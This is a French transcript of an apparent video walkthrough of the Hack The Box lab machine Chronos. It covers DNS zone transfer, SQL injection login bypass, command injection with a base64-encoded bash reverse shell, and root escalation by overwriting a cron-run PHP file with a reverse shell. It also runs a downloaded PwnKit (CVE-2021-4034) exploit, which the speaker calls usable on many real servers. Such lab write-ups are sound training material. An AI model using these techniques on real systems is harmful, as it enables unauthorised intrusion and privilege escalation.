Donc c'est une Linux Hack the Box que je n'ai jamais faite. La machine s'appelle Chronos et elle est de niveau médium. Mon adresse IP est ici. Et l'adresse IP de la cible est là. Alors je vais faire un nmap déjà pour commencer avec un "-p- pour balayer tous les ports, "-v pour énumérer les versions, "-c pour utiliser le script par défaut, "-t4 pour aller vite, suivi de l'adresse IP. Je pense qu'on est bon. Allez, c'est parti. Donc mon scan de port me dit qu'il y a un port SSH. Le service SSH, c'est du OpenSSH à peu près à jour. Je vais pas avoir de vulnérabilité telle quelle. Les seuls moyens de pouvoir exploiter ce service, c'est d'avoir un compte légitime, ou pas, hein, mais avoir un compte en gros. Soit avoir un user mot de passe, soit avoir une clé privée. Ensuite, je vois qu'il y a un port 53 DNS, c'est assez inhabituel. Je vois que c'est un Ubuntu Linux. Il y a du ISC bind sur cette version-là. J'ai envie de faire un search exploit pour commencer ISC bind sur cette version-là. ISC bind tout court. Je vois qu'il y a des exploits publics sur, et nous on est en 9.10.3-P4. 9. Et là on a des versions 9. C'est du déni de service, déni de service, déni de service et déni de service. Ok. Donc c'est que du déni de service. Et en plus, nous, on n'est pas sur du 9 tout court, on est sur du 9.10.3. Je sais pas jusqu'où ça va, mais -P4, ça veut dire patch 4. Donc en gros, c'est probablement un truc à jour. Je n'ai pas envie de trop checker. Par contre, je me dis qu'il y a peut-être du zone transfert. DNS zone transfert, c'est la première faille que j'ai envie de faire dessus. Et la deuxième faille, c'est exploiter le service. Et ici, il n'y a pas de service. Pour avoir du DNS zone transfert, j'ai besoin du coup d'un nom de domaine. Un domaine. J'en ai pas, donc pour l'instant, je me dis qu'il n'y a rien. Ensuite, j'ai du Apache. Je vois qu'il y a du Apache 2.4.18, ça m'inquiète pas plus que ça. Si c'était du 2.4.49, il y aurait du directory listing, enfin du directory traversal possible, puisque 2.4.49, il faut l'apprendre par cœur en fait, contenait une version backdoorée qui contenait du coup un directory traversal possible. Je vois qu'il y a une page par défaut de Apache, j'ai envie de regarder s'il y a un fichier robots.txt. Il n'y a pas, j'ai envie de regarder s'il y a un dossier admin. Il n'y a pas. Et à la racine, tout ce qu'on a, c'est une page par défaut, Apache 2 Ubuntu, qui nous dit rien d'intéressant. Donc ce que j'ai envie de faire du coup, c'est de faire du GoBuster là-dessus, pour essayer de découvrir un répertoire intéressant. Donc GoBuster, dir-u, http://l'URL. Alors dir pour faire du... Alors GoBuster, dir c'est pour faire du brute force de répertoire du site web, -u pour préciser l'URL, -w pour préciser une word list, et on lance dirbuster avec directory list 2.3 medium et c'est parti. Sur Hack the Box, souvent c'est le nom de la machine .htb. Donc ici la machine elle s'appelait Chronos, c'était sur le site de Hack the Box, chronos.htb. C'est souvent ce format là et on peut peut-être mettre ça dans notre fichier etc host et chronos.htb. Est-ce que mon fichier etc host peut permettre de résoudre maintenant http://chronos.htb? Est-ce que j'ai une interface différente? Oui, j'ai envie du coup de lancer un DNS zone transfert avec ça. Pour faire ça, je vais faire un dig accessfr at l'IP suivi du nom du domaine et là c'est chronos j'ai marqué crontab chronos.htb. Voyons si ça nous trouve quelque chose. Ah, joli. Ok, bon ben il y a admin.chronos.htb. On a quoi? On a www.chronos.htb. Donc on va rajouter ça dans notre TC host chronos.htb. Un autre truc qu'on aurait pu faire, je vous fais la démonstration ici. Et donc avec ça, on peut faire un brute force. Du coup, on peut faire un brute force de tous les domaines qui se situeraient. Donc http://xxx.chronos.htb. Et en faisant ça, on a pu deviner admin.chronos.htb. Donc en gros, tout ça pour avoir deux nouveaux sites, parce qu'il y a deux vhosts. J'ai envie de tester admin en gros, et admin password. J'ai rien, j'ai envie de tester une SQLi vite fait. Donc j'ai plusieurs idées. Soit il faut brute forcer ce site web, soit il faut brute forcer ce login. Mais ce qui m'embête, c'est que je dois brute forcer le username et le password. Je peux deviner que le username c'est peut-être admin parce qu'on est sur la page d'admin. Et qu'il faudrait brute forcer le password. Je vais submit et j'ai intercepté avec mon proxy Burp Suite. Donc en gros, j'ai redirigé mon site web, enfin mon navigateur Firefox, pour qu'il passe pas directement sur les adresses IP ou les URL que je veux pointer, mais qu'il passe d'abord par mon proxy local grâce au logiciel Burp Suite qui intercepte ça.
Donc je vais faire clic CTRL R pour envoyer ça dans répéteur. Comme ça je peux répéter mes paquets HTTP. Mais surtout les manipuler avant de faire ça. Donc je vais essayer de manipuler un petit peu mes paquets HTTP. Genre je vais faire ça. Il me dit login OK. Et il m'affiche login or password invalid. Je vais essayer username comme ça. Je vais essayer de faire bugger la variable. Avec des crochets ici. Ça marche souvent en PHP. J'ai quand même un OK. Et login or password invalid. OK. Je peux faire un clic droit. Copy to file. Je vais envoyer ça. Je vais enregistrer cette requête au format .rq. Enfin, c'est moi qui l'appelle .rq. Je l'appelle comme je veux en fait. J'enregistre cette requête. Ah, voyons les GoBusters vite fait. Ok, ça n'a rien donné. Ok, clear. Je vais, maintenant que j'ai enregistré cette requête, je vais pouvoir lancer un SQL map avec ça. -r rec.rq -threads 10. Et en fait, je vais lancer un outil qui va essayer de détecter s'il y a des SQL injections ou pas dans ce formulaire. Puisqu'il y a plein d'injections SQL plus poussées à faire que celles que j'ai déjà faites. Pendant que SQL Map tourne et est en train de brute forcer, je peux déjà me renseigner sur comment faire un Hydra pour essayer de brute forcer ce formulaire. Bon, la SQL injection a marché, et donc je voulais absolument vous montrer comment faire un Hydra. Ça marche comme ça. Donc je lance le Hydra, et pendant que le Hydra tourne, on va voir si on aurait pu trouver avec Hydra, mais on a réussi à avoir une SQL injection avec SQL Map. On peut se connecter comme ça, si jamais le username Toto existe. Il n'existe pas. Et là, je voulais voir si le username admin existe. Voyons. Et il existe. Voyons, donc ici, ça fait un traceroute ou un ping. Je vais faire un netcat-lnvp 9001 pour me mettre en écoute sur mon port 9001. Et je vais considérer qu'il y a peut-être moyen de faire une command injection. C'est-à-dire que quand je fais un traceroute, ça veut dire qu'il y a un Linux derrière qui fait peut-être un traceroute de 8.8.8. Ou alors un ping de 8.8.8.8. Moi, je veux peut-être faire une injection où en gros, il va récupérer tout ce que j'ai mis à la place de l'adresse IP ici et il va l'insérer à la suite de la commande traceroute ou ping. Donc moi, j'ai envie d'insérer, au lieu d'insérer 8.8.8.8, j'ai envie d'insérer 8.8.8.8, mais en rajoutant point virgule, disons point virgule ping-c1 pour pinguer une fois, suivi de l'adresse de mon adresse IP. Voilà. Donc je vais essayer d'injecter ça dans la commande traceroute et je vais à côté, je vais pas me mettre en listening, du coup je vais me mettre en sniffing, je vais lancer un TCP dump du coup pour sniffer tous les paquets, -i minuscule, suivi de mon interface, donc mon interface c'est une 0 et je vais rajouter un filtre ICMP pour ne sniffer que les paquets ICMP. Donc là, je vais lancer un ping, enfin un traceroute. Ça devrait faire un traceroute sur 8.8.8.8, point virgule, et j'essaie d'injecter une commande, on appelle ça de la command injection, suivi d'un ping vers mon adresse IP. Si le ping réussit, je verrai ici que je reçois des paquets ICMP, donc je reçois le ping sur ma machine, sur mon IP attaquante. Et si c'est le cas, ça veut dire que j'arrive à exécuter des commandes sur la machine cible. Et au lieu de ping, je pourrais exécuter une commande malveillante. Ping, voyons. Allez, bim. Echo reply, on a eu un echo reply. Nickel. Est-ce que la commande ping marchait aussi? Voyons. Tac. Exécute. Ah, la commande ping du coup semble mieux codée. Par contre, la commande traceroute semble moins bien codée. Ou alors il y a un timeout. Ah si, je l'ai eu, ça y est, je l'ai eu. Donc c'est parce qu'il y a un timeout. Il fait un traceroute, il attend, il y a un timeout et quand ça échoue, après il fait le ping. Je vais utiliser traceroute parce que c'est plus rapide, c'est instantané, vous voyez. À chaque fois que je clique là, je vais faire execute et en bas, vous voyez ici en bas, clique, j'ai une réponse. Clique, j'ai une réponse. Donc à la place du ping, je vais à la place de ping. Alors je peux faire point virgule pour injecter des commandes, juste pour rappel. Injection de commandes possibles. On peut faire point virgule, on peut faire and, on peut faire and, on peut faire pipe, on peut faire pipe. Dans certains cas, on peut faire le caractère anti/n ou anti/r ou anti/r anti/n, ça dépend si c'est un Linux ou Windows. Là, c'est un Linux, donc c'est anti/n, c'est-à-dire 0x0a, je crois.
ou 0x0d, je sais plus, l'un ou l'autre. Mais en gros, il y a moyen de faire des commandes injection avec ça parfois. Parfois, on peut faire de la command injection avec un null byte aussi, à connaître. Bash, reverse shell, pentest monkey, parce que je vais aller sur le site de pentest monkey, parce qu'il y a des reverse shell très basiques, et ça m'intéresse que ce soit basique pour vous montrer pédagogiquement. Je prends le premier site. Ça consiste à renvoyer un shell du terminal Linux vers ma machine attaquante. Donc je dois juste changer cette adresse IP par l'adresse IP de ma machine attaquante, puisque c'est la machine cible qui va se connecter vers ma machine attaquante en TCP sur un port de mon choix. Je veux dire que c'est le port 9001. Donc je dois me mettre du coup de mon côté en écoute. Je dois me mettre en écoute sur le port 9001 avec Netcat par exemple pour pouvoir réceptionner le shell qui va m'être envoyé par la machine cible. Donc je vais injecter cette commande après le point virgule et je vais copier-coller tout ça sur le site web dans l'injection de commande ici. Voyons, ça m'a l'air ok. Je fais exécute et on va regarder à gauche si ça marche. Et là, ça n'a pas marché. Je soupçonne du coup que c'est parce que j'ai des caractères qui sont mal encodés. En fait, en général, ça déteste les e-commerciaux. Donc je vais faire un écho de cette commande que je veux injecter. Et je veux le piper dans base 64 pour l'encoder en base 64. Donc voilà une commande encodée en base 64 que je vais injecter. Donc maintenant, je vais faire une injection de commande. Et ce que je vais injecter, je vais faire un écho de ce base 64 que je vais piper dans base 64-D pour le décoder, que je vais piper ensuite dans bash pour pouvoir décoder et invoquer directement dans bash. Et ça, normalement, ça devrait me donner un reverse shell. Et on va voir ce que ça donne. Coller. Et ça a marché, j'ai un shell. Hostname, j'ai un shell sur la machine Chronos. Et je suis pas admin, je suis 3W Data, c'est-à-dire le user qui lance le site web. Et il faut continuer pour pouvoir être admin de la machine cible. Si je fais écho de ce base 64, ça m'affiche le code en base 64. Ça me fait tout simplement le écho du base 64. Par contre, si je fais écho de ce base 64 et que je le pipe dans une autre commande qui est base 64-D, c'est-à-dire -D pour décode, ça va du coup décoder le base 64. Et si je repipe ça encore dans bash, c'est que ça va exécuter dans bash le contenu que j'affichais ici. Donc plutôt que de l'afficher, ça va l'exécuter. Et ça tombe bien parce que ça va exécuter du coup ce que je voulais, parce qu'il y a des caractères spéciaux. Vous voyez l'idée ? Tu vois l'idée? Donc en gros, ça me permet de faire un écho d'un truc qui contient pas de caractères spéciaux, de le décoder pour que ça affiche des caractères spéciaux, et que ça l'exécute sans que ça les fasse bugger ces caractères spéciaux, et que ça les garde intègres de A à Z. De cette manière-là, je peux éviter de jouer avec les caractères spéciaux et faire de l'injection de commande correctement. Et donc comment fait le serveur? En gros, là je fais cette commande, point virgule pour faire l'injection de commande, ensuite je fais écho du base 64, que je pipe dans base 64-D pour le décoder, que je pipe dans bash pour l'exécuter. Voilà, donc en gros j'ai exécuté la version décodée du base 64. Et du coup, tous ces caractères-là ne contiennent aucun caractère spécial qui risquerait de faire bugger ma requête. Voilà l'idée. J'ai fait Which Python pour voir s'il y avait la commande Python. Je vois qu'il y a Python. Quand il y a Python, c'est facile d'avoir un shell TTY, ce qui me permet d'avoir les flux, si jamais on me demande un mot de passe dans un second temps, que ça ne casse pas mon pipe, mon shell en gros. Donc je vais faire un python-c import pty.spawn /bin/bash. Si vous connaissez pas cette commande par cœur, il vous suffit de regarder dans Google how to get tty shell with Python par exemple, et vous trouverez la commande. Hop, j'exécute ça. C'est bon, maintenant j'ai un shell TTY, donc je peux faire déjà ID. Je vois que j'appartiens pas à un groupe bizarre. Je peux faire un sudo-l peut-être. Il me demande un mot de passe, je le connais pas. Je vais essayer admin. Et je vais essayer Toto, voilà. Donc j'ai pas réussi, je connais pas le mot de passe. ls. Je vois qu'il y a un fichier config.php, ça m'intéresse. Voyons s'il n'y a pas un mot de passe dedans. Ok. Je vois qu'il y a un username qui s'appelle admin, qu'il y a un mot de passe qui s'appelle tout ça. J'imagine que c'était le mot de passe pour se connecter au site web. Mais que nous, on n'avait pas besoin de le connaître puisqu'on pouvait bypasser
le login. Grâce à cette requête SQL qui est non filtrée, elle est envoyée de manière insecure. Il n'y a pas de fonction qui permet d'épurer les caractères à risque. Elle est envoyée telle quelle, c'est pour ça qu'on a pu faire l'injection SQL. On note quand même ce mot de passe, peut-être qu'il est réutilisé ailleurs. Ah oui, il y a un truc que j'ai pas fait. La machine s'appelle Chronos en plus. Je me demande s'il n'y a pas des cron tab. Donc je fais cron tab-L. Ok, il n'y a pas de cron tab pour le user courant. Mais du coup, je vais essayer d'afficher etc cron tab pour voir s'il n'y a pas des cron tab de manière universelle. Un cron tab de la part de root. Il lance cette commande régulièrement. Donc on peut voir cette commande. Artisan. Je suis 3W data. Trop important. Donc je peux le modifier. Ce truc est modifié et exécuté par root. Donc root fait PHP suivi de ce binaire et il fait un schedule run. Donc je pense que il y a moyen de modifier, d'injecter un reverse shell PHP là-dedans. Donc je vais faire un echo de ça. Et ce echo devrait rajouter la ligne PHP qui va bien pour mettre un reverse shell PHP. Il faut juste que je change l'adresse IP par mon adresse IP à moi. Pour renvoyer le shell vers mon IP. Vers un port. 9001 est déjà pris, donc je vais mettre 9002. On va essayer ça. Donc déjà je lance un netcat-lnvp 9002. Oula. 9002. Et du coup sur l'autre shell, ici je suis en écoute, on va voir si ça marchera. Et dans l'autre shell, je vais faire ce écho là. Voilà. Je vais faire un cat du binaire pour voir. Je vois effectivement qu'il y a un exit ici, et ensuite un exec de mon reverse shell. Et on va attendre, on va espérer que ça marche. Du coup, ça doit boucler le PHP, sans doute, le code PHP. Faut que je le... je peux l'écraser, en fait. Je peux l'écraser. Je peux l'écraser avec tout ça, en fait. Je peux faire ça. PHP, point virgule, c'est la fin. Voilà, je ferme ça. Juste ça, mais je vais faire un seul chevron, comme ça. Une seule flèche, pour écraser le fichier. Ce que je peux faire, puisque je suis owner du fichier. Voyons. Voilà. Ici, j'ai toujours mon listing. Je vérifie le fichier. cat var 3w laravel /artisan. Et je vois qu'effectivement, le contenu, c'est une balise PHP, mon code PHP, et fermer la balise PHP. Et on va attendre, on va voir ce que ça donne. Et le exit est censé quitter le script PHP. Ah ouais, nickel. Who am I? Et je suis root. Nous sommes root. Et tout à fait, Lagoons, effectivement, il s'arrête au exit. Tu avais complètement raison. Ce qui se devinait, hein. On voit un exit, genre, même sans trop réfléchir, on se dit, oh ben, je tente mon reverse shell, s'il marche pas, vu qu'il n'y a qu'une minute d'attente, je veux dire, on le fait en dessous, au-dessus. Donc je vois qu'on est sur un kernel qui date de 2017, d'ailleurs il doit y avoir des exploits kernel, hein. Mais on va pas les faire parce que c'est newbie, mais il y a forcément des exploits kernel depuis le temps. Mais par contre, il y en a un super récent qui est moins newbie parce qu'il est carrément utilisable dans la vraie vie, puisqu'il est assez récent pour être non patché pour plein de serveurs. Il y a pkexec et c'est une CVE qui est sortie fin 2021. Est-ce qu'il y a GCC tant qu'on y est? Ah, mais il y a Python CVE. C'est CVE 2021 4034. J'ai pas la version en Python. Faut que je la retélécharge. Je l'avais pas download dans le répertoire qu'il fallait l'autre fois. Python, je vais taper 4034. PoundKit, exact. Python exploit code, c'est ça que je veux. Sepoc, c'est ça que je veux. Row, c'est ça que je veux. Ok. Wget du script et je reviens dans le répertoire précédent et je vais faire un copy de home kali tools ce script, copy, voilà. Je vais le copier en local, voilà. Et je vais l'appeler move cve machin, je vais l'appeler poundkit.py. Je vais me mettre en serveur web avec Python, c'est très facile. Je me mets sur le port 80 et comme ça, la machine cible va essayer de se connecter. Celle qui est simple utilisateur, je vais aller dans TMP pour pouvoir écrire dedans. Et je vais faire un wget de http:// la machine attaquante /poundkit.py et ls. Et maintenant, je vais lancer ce script, donc Python de poundkit.py. Et je suis root. Haha, trop bien. Et je suis root. Donc on a pu exploiter la faille poundkit tout simplement en lançant la version Python. On fait Python de poundkit.py.
Faut juste l'envoyer sur la machine cible et dès lors que c'est fait, j'aurais même pu le copier-coller. Ça m'aurait évité de faire un serveur web et autres. Et juste je l'exécute et je suis root. Et bim! Allez, bim! PoundKit! Trop bien! Donc un petit résumé de ce qu'on a fait. On a fait un scan de port. On pouvait fuiter le nom en faisant un NSLOOKUP comme ceci. On le mettait dans l'ETC host. On pouvait tomber sur un site web. Il n'y avait rien d'intéressant sur le site web. Par contre, on pouvait faire un DNS zone transfer avec cette commande. Sur le domaine chronos.htb, ça nous fuitait admin.chronos.htb. Une page d'admin sur laquelle il y avait une SQL injection. On avait essayé de brute forcer, ça nous avait rien donné. Par contre, on pouvait faire de SQL injection. Une fois qu'on a pu s'authentifier en tant qu'admin, on a pu faire une commande injection où on a pu utiliser cette commande injection pour faire un reverse shell. Et on était simple utilisateur, on était le user 3W data. À partir de là, on a pu voir qu'il y avait root qui lançait régulièrement avec un cron tab. D'ailleurs, le titre de la machine c'était Chronos, donc ça pensait à cron tab, les cron jobs. Donc on voyait qu'il y avait une tâche planifiée qui exécutait régulièrement une commande en tant que root, qui exécutait du coup un script PHP. Le propriétaire de ce script PHP c'était 3W-data. Donc on pouvait tout simplement le modifier pour que root exécute ce qu'on voulait lui faire exécuter. En l'occurrence un reverse shell codé en PHP qui nous retourne un shell en tant que root. Et comme c'était un petit peu trop facile, on s'est amusé également à poker le tout récent exploit qui est probablement présent sur la plupart des serveurs que vous pouvez cibler en ce moment. Bien sûr, il faut d'abord un shell sur la victime, sur la machine cible. Mais une fois que vous avez ça, vous pouvez y uploader l'exploit de Polkit qui permet d'exploiter pkexec, soit sa version en C, soit sa version en Python. Ici j'ai essayé la version Python, ça marche. Et on est passé root en une commande. Super sympa, super efficace, j'adore. Log4Shell plus PoundKit combo pas dégueu, exactement. Log4Shell, ça expose beaucoup de serveurs vulnérables sur internet. Et PoundKit, on passe root facilement comme ça. Passez une excellente soirée, à très bientôt, ciao ciao.